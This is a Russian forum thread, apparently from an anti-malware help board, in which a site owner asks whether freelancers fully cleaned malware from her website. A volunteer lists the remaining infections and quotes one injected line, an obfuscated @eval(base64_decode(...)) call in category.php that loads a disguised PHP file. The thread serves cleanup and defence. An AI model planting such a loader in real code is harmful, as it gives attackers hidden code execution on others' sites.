# Форум на русском языке  > Лечение и защита сайтов от вирусов  >  А был ли вирус

## magenta2009

Здравствуйте! Очень прошу помощь

Касперский увидел у сайта вирус, я через сайт antivirus-alarm.ru проверила, пишет тоже есть вирусы

Обратилась на фриленс, нашла исполнителя, он сказал что все сделал.

Касперский больше не срабатывал, Но через antivirus-alarm.ru все равно отображались вирусы

я сказала, что хочу уточнить данный вопрос дайте на это день, он ответил

что внешние проверки ненадежны.
сайта в базах антивиров нет
virustotal.com

а то что antivirus-alarm.ru показывает все это falsepositive. Ложное срабатывание.
внизу сайта есть приписка.

>>Если по данным проверки один из алгоритмов обнаруживает вирус, это не всегда однозначно свидетельствует о зараженности сайта. Иногда шифрованный код рекламных блоков и другие подобные элементы сайта подпадают под определения тех или иных антивирусных баз – это НЕ вирусы.>>


И я обратилась к другому фриленсеру и объяснила ситуацию, он попросил перекачать сайт на яндекс диск и проверил айболитом, после чего прислал отчет, вот он - http://prnt.sc/rw3ix4

, сказал что удалили не все, вирусы остались

Первый фриленсер с этим не согласился, сказал что Айболит как и любой сканер , в том числе и мой дает кучу ложных страбатываний, для их трактовки нужен человек и квалификация и попросил полный отчет, вот он - http://prihvatka.ru/polny-otchet-aibolit.html
и посмотрев полный отчет написал что

)) все как я и думал.

итого
Айболит показал 3 вредоносных файла.
Читаем отчет.

1. C:\Users\�������\Desktop\aibol it-for-windows\site/www/cheapt op_script.php
[x] BIG FILE. SKIPPED.

>>BIG FILE. SKIPPED означает что Айболит не смог проверить файл из за размеров. Он слишком большой.

2. C:\Users\�������\Desktop\aibol it-for-windows\site/www/fscure /print.php
[x] 1…······· ··············</a><br ><a href="fstrange.ru/coder/php/cur... phpshell.html">······ ············ ············,············</ a><br></div>< div

fscure/print.php это моя утилита. Ей я проверял ваш сайт. А ругается айболит в этот раз на ссылку на мой же сайт ))
Потому что в ссылке написано phpshell . В этой статье рассказывается про поиск шеллов.

3.www/includes/index.php
Это Unzipper . Вполне обычная утилита для распаковки файлов. И никак не вирус. Судя по дате ее оставил в доисторические времена кто то из разработчиков сайта.2014-10-03 00:53:05

Второй человек вместо скрина не удаленного вируса который я просила изначально, попросил дать доступ потом написал готово, вот его отчет что вирусов нет-
http://prihvatka.ru/polny-othet-viruson-net.html
, сказал что работал по 3 строчке . Я спросила- так это был вирус или утилита unzipper? он говорит что в этой утилите была вредоносная приписка в полном отчете часть ее видна

при чем я просто просила скрин хотя бы 1 вируса если есть и ничего не удалять

Так как просто хотела убедиться, если не все удалено и сообщить об этом первому человеку чтобы не было обид и потом уже попросить удалить второго и оплатить уже его работу.

Я же не могу оплачивать двоим за одну и ту же работу и не хотела чтобы 2 человека сделали работу и я должна одному из них не заплатить. Это не правильно.

Так вот и вопрос в 3 строчке
www/includes/index.php
Это Unzipper . Вполне обычная утилита для распаковки файлов. И никак не вирус.

или

там вредоносная какая то приписка и это вирус?

Очень прошу помочь

и вопрос может ли Айболит давать ложное срабатывание как утверждал первый исполнитель?

p.s/ после чистки вторым фриленсером на сайте antivirus-alarm.ru ничего не изменилось

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Val_Ery

Извините, но я как-то сомневаюсь в том, что после прочтения описаний ваших попыток подловить двух программистов на некачественно выполненной работе вы сможете найти третьего... Вообще, я рекомендую обращаться НЕ к фрилансерам, а в крупные антивирусные компании: у них и ценник на порядок дороже, и без предоплаты они не работают.

По вашим вопросам...
Чем является ваш индексный файл ( index.php), вам никто не скажет без просмотра его содержимого. Он вообще может ничего не содержать, кроме тега  php, если разработчик хотел запретить просмотр содержимого каталога через адресную строку браузера.

Да, у ай-болита могут быть ложные срабатывания. Особенно, если запускать его в параноидальном режиме. Я вам больше скажу, если в корне сайта остались отчёты ай-болита (которые вам оставил первый фрилансерам, чтобы продемонстрировать результат работы), следующее сканирование объявит вредоносом этот неудаленный отчёт. Ибо в нем будут содержаться обнаруженные куски исполняемого кода.

Относительно антивирус-аларма. Я про существование этого ресурса узнал от вас. Вам его кто-то порекомендовал? Или в гугле нашли?

----------


## Aleksandra

Здравствуйте!

Нужна полная копия сайта (файлы + БД), причем изначальная на которую ругался Касперский. Пишите в лс.

Помощь оказывается бесплатно, так что тут платить Вам точно не придется.

----------


## magenta2009

> Здравствуйте!
> 
> Нужна полная копия сайта (файлы + БД), причем изначальная на которую ругался Касперский. Пишите в лс.
> 
> Помощь оказывается бесплатно, так что тут платить Вам точно не придется.


Спасибо большое. Скинула бэкап, написала в лс.

----------


## Aleksandra

> Спасибо большое. Скинула бэкап, написала в лс.


Забрала бэкап, ждите ответа. Если что-то понадобится будьте на связи, напишу в личку.

----------


## Aleksandra

Добрый день!

По результатам анализа Вашего сайта могу сказать, что вирусы там были и первый фрилансер почти все удалил. Единственное:

1. Файлик cheapt op_script.php нужно удалить из корня сайта.
2. В файле /www/published/SC/html/scripts/includes/category.php удалить кусок


```
@eval(base64_decode('QGluY2x1ZGUoIm1vZHVsZXMvc2hpcHBpbmcvbGFuZ3VhZ2VzL3J1LmludGVyc3NoaXBwZXJtb2R1bGUucGhwIik7'));
```

В остальном все чисто.

----------


## magenta2009

Спасибо вам огромное!!! То есть второй фрилансер удалял уже не вирусы а просто куски кодов?

----------


## Aleksandra

> То есть второй фрилансер удалял уже не вирусы а просто куски кодов?


Второй вообще дилетант в этом деле.

p.s. Пароли смените.

----------


## magenta2009

> Второй вообще дилетант в этом деле.
> 
> p.s. Пароли смените.



Спасибо!!!

----------

